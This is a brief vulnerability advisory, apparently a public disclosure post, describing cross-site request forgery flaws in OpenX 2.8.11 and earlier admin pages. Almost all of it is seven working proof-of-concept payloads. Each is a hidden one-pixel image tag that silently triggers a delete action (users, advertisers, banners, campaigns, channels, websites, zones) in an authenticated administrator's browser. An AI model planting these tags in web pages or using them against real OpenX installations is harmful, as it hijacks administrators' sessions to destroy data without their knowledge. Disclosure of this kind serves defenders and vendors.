OpenX 2.8.11 Cross Site Request Forgery

Hello,

Multiple
cross-site request forgery (CSRF) vulnerabilities in OpenX 2.8.11and earlier allows remote attackers to hijack the authentication of
administrators for requests that delete (1) users, (2) advertisers, (3) banners,
(4) campaigns, (5) channels, (6) websites or (7) zones via delete actions.

File: admin/agency-user-unlink.php
POC: 

<img src='http://site/admin/agency-user-unlink.php?agencyid=1&userid=18' width="1" height="1" border="0">

File: admin/advertiser-delete.php
POC:
<img src='http://site/admin/advertiser-delete.php?clientid=10' width="1" height="1" border="0">

File: admin/banner-delete.php
POC:
<img
src='http://site/admin/banner-delete.php?clientid=2&campaignid=7&bannerid=16'
width="1" height="1" border="0">

File: admin/campaign-delete.php
POC:
<img src='http://site/admin/campaign-delete.php?clientid=2&campaignid=11' width="1" height="1" border="0">

File: admin/channel-delete.php 
POC:
<img
src='http://site/admin/channel-delete.php?affiliateid=1&channelid=6'
width="1" height="1" border="0">


File: admin/affiliate-delete.php
POC:
<img
src='http://site/admin/affiliate-delete.php?affiliateid=9' width="1" height="1"
border="0">


File: admin/zone-delete.php
POC:
<img
src='http://site/admin/zone-delete.php?affiliateid=1&zoneid=11'
width="1" height="1" border="0">

Best regards.